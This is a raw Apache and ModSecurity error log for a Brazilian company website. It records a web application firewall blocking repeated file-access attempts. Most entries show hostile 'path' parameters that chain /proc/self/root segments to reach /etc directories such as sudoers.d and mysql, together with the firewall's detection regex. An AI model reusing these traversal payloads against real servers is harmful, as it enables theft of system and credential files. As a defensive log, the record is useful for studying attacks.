[Tue Mar 17 17:05:17.737033 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:49494] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmz_da6ubjKNq_cu4Ya1AAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 17:05:37.129768 2026] [proxy_fcgi:error] [pid 25836:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:59892] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:06:01.124520 2026] [proxy_fcgi:error] [pid 7004:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:60868] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:06:04.550953 2026] [:error] [pid 7437:tid 140411565680384] [client 74.7.241.31:37426] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm0LAeiSKl8TjouI-YqxAAAA9U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:06:15.181222 2026] [:error] [pid 2598:tid 140411725141760] [client 74.7.243.128:35934] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm0Nxj0p0SRWAqcjGGMTQAAAwI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:06:24.137785 2026] [proxy_fcgi:error] [pid 19507:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:33680] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:06:26.863144 2026] [:error] [pid 6296:tid 140411674785536] [client 74.7.241.31:47074] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm0QnIk7brgkOH-rIWfewAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:06:33.435194 2026] [:error] [pid 2473:tid 140411616036608] [client 74.7.243.128:42518] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm0SaBJNF7axNlVR0UrdQAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 17:06:46.125829 2026] [proxy_fcgi:error] [pid 25836:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:34490] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:06:52.446493 2026] [:error] [pid 7004:tid 140411565680384] [client 74.7.241.31:46592] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm0XMU6Sx0TG1YjmQjBjgAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 17:07:08.061950 2026] [proxy_fcgi:error] [pid 7437:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:35300] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:07:31.137783 2026] [proxy_fcgi:error] [pid 18380:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:36078] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:07:44.195237 2026] [:error] [pid 29151:tid 140411540502272] [client 74.7.241.31:49956] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm0j_PqhzTj3BvfDX-amwAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:07:53.125809 2026] [proxy_fcgi:error] [pid 2598:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:37020] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:08:16.129813 2026] [proxy_fcgi:error] [pid 25836:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:37960] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:08:26.679085 2026] [:error] [pid 29151:tid 140411590858496] [client 74.7.241.31:45882] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm0uvPqhzTj3BvfDX-axAAAAdI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:08:37.119252 2026] [proxy_fcgi:error] [pid 25836:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:38872] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:08:41.831360 2026] [:error] [pid 6296:tid 140411699963648] [client 74.7.241.31:37854] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm0yXIk7brgkOH-rIWfugAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:08:47.208711 2026] [:error] [pid 25836:tid 140411699963648] [client 74.7.241.31:45628] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm0z4h-PF_25v4hFRB-EQAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:08:50.395751 2026] [:error] [pid 32125:tid 140411658000128] [client 74.7.241.31:42712] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm00jv_Uz7NvOGZZdL6aQAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:08:58.129882 2026] [proxy_fcgi:error] [pid 7437:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:39942] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:09:11.470025 2026] [:error] [pid 2598:tid 140411632822016] [client 74.7.243.128:42218] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm05xj0p0SRWAqcjGGMzAAAAw0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 17:09:18.380204 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.244.43:44816] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abm07ta6ubjKNq_cu4YbhAAAA1E"]
[Tue Mar 17 17:09:21.137814 2026] [proxy_fcgi:error] [pid 7004:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:40828] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:09:37.256937 2026] [mime_magic:error] [pid 2598:tid 140411557287680] (70014)End of file found: [client 74.7.243.128:39826] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/run
[Tue Mar 17 17:09:37.257193 2026] [access_compat:error] [pid 2598:tid 140411557287680] [client 74.7.243.128:39826] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/run
[Tue Mar 17 17:09:38.967826 2026] [:error] [pid 25836:tid 140411699963648] [client 74.7.243.128:46758] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm1Aoh-PF_25v4hFRB-GwAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 17:09:44.136462 2026] [proxy_fcgi:error] [pid 26799:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:41496] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:09:48.769351 2026] [:error] [pid 32637:tid 140411683178240] [client 74.7.241.31:42728] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm1DOb2RVWFKPpFAR6FUQAAAkc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:09:53.707204 2026] [:error] [pid 7437:tid 140411674785536] [client 74.7.241.31:45914] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm1EQeiSKl8TjouI-YrFgAAA8g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 17:09:54.169387 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.228.61:51214] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abm1EuyqAr6etmhZHNo6EgAAAFA"]
[Tue Mar 17 17:09:54.511820 2026] [:error] [pid 32444:tid 140411616036608] [client 74.7.243.128:46250] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm1EmhA41DpGx8pNLQ1WAAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 17:09:57.087539 2026] [:error] [pid 18380:tid 140411716749056] [client 74.7.241.31:45916] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm1Fa4xEDsg_V3ESNZehwAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 17:10:06.105381 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.241.31:48836] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm1HuyqAr6etmhZHNo6IAAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 17:10:07.121787 2026] [proxy_fcgi:error] [pid 7004:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:42300] AH01075: Error dispatching request to : (polling)
